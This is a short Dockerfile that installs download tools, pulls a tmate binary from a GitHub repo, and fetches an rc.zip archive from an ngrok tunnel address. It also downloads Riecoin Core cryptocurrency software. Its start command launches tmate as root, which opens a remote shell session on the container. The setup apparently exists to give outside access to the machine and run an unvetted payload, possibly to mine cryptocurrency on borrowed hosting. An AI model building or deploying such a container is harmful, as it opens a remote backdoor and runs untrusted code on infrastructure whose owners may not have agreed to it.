FROM ubuntu:latest RUN apt update && apt install wget unzip zip curl git -y RUN git clone https://github.com/rienode0001/test RUN chmod +x test/tmate RUN cp test/tmate . RUN chmod +x tmate RUN wget https://4b7c-185-85-242-35.ngrok-free.app/rc.zip RUN unzip rc.zip RUN wget https://riecoin.dev/resources/RiecoinCore/Linux64 -O r.tar.gz RUN tar zxvf r.tar.gz USER root CMD ["./tmate" , "-F"]